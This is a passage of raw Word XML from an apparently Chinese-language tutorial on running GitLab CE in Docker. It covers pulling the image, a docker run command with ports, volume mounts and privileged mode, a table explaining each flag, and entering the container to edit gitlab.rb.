        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>拉取</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Gitlab</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E4B1F" w14:textId="3802E87C" w:rsidR="00AE0CCC" w:rsidRDefault="00D667B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker pull gitlab/gitlab-ce:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7CD9E" w14:textId="1087E44B" w:rsidR="00AE0CCC" w:rsidRDefault="00AE0CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D8BB70" w14:textId="30EAF9FD" w:rsidR="00626627" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41853EF8" w14:textId="69CF1411" w:rsidR="00AF2230" w:rsidRPr="00AF2230" w:rsidRDefault="00AF2230" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>这里d</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ocker run</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>命令的-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>以及docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-compose.yaml</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>中的-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>挂在目录，不需要你自己手动创建目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>即便目录不存在，他会自动创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B7401" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker run \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE2CAC" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -itd  \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C481F3" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 9980:80 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA1B59" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 9922:22 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B7F788" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v /home/gitlab/etc:/etc/gitlab  \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419FD9D9" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v /home/gitlab/log:/var/log/gitlab \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C753193" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v /home/gitlab/opt:/var/opt/gitlab \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FBA2C7" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> --restart always \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA085FC" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> --privileged=true \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F40D849" w14:textId="77777777" w:rsidR="00626627" w:rsidRPr="00823814" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> --name gitlab \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484DC612" w14:textId="45B623CA" w:rsidR="00AE0CCC" w:rsidRDefault="00626627" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> gitlab/gitlab-ce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F5A5C" w14:textId="668A3557" w:rsidR="00FD68ED" w:rsidRDefault="00FD68ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338AB6AE" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F11B7" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以交互模式运行容器，通常与</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同时使用命令解释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA797E2" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>为容器重新分配一个伪输入终端，通常与</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i </w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同时使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7AA36D" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-d</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后台运行容器，并返回容器</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC5CC6" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-p 9980:80</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将容器内</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>端口映射至宿主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9980</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>端口，这是访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DFD90B" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-p 9922:22</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将容器内</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>端口映射至宿主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9922</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>端口，这是访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B964EEA" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-v /home/gitlab/etc:/etc/gitlab</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>将容器</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/gitlab</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录挂载到宿主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/usr/local/gitlab-test/etc</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录下，若宿主机内此目录不存在将会自动创建，其他两个挂载同这个一样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505E51A1" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--restart always</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容器自启动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E799C" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--privileged=true</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>让容器获取宿主机</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C33A2" w14:textId="77777777" w:rsidR="00381D0F" w:rsidRPr="00823814" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--name gitlab</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>设置容器名称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8C787" w14:textId="6ED26488" w:rsidR="00FD68ED" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gitlab/gitlab-ce</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>镜像的名称，这里也可以写镜像</w:t>
      </w:r>
      <w:r w:rsidRPr="00823814">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1867A6ED" w14:textId="5B7B8CC4" w:rsidR="00381D0F" w:rsidRDefault="00381D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294C52D7" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进容器内部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012C204" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>docker exec -it gitlab /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA1156" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967C9B7" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB2312B" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>vi /etc/gitlab/gitlab.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68152798" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9CDE7E" w14:textId="77777777" w:rsidR="002B628C" w:rsidRDefault="002B628C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
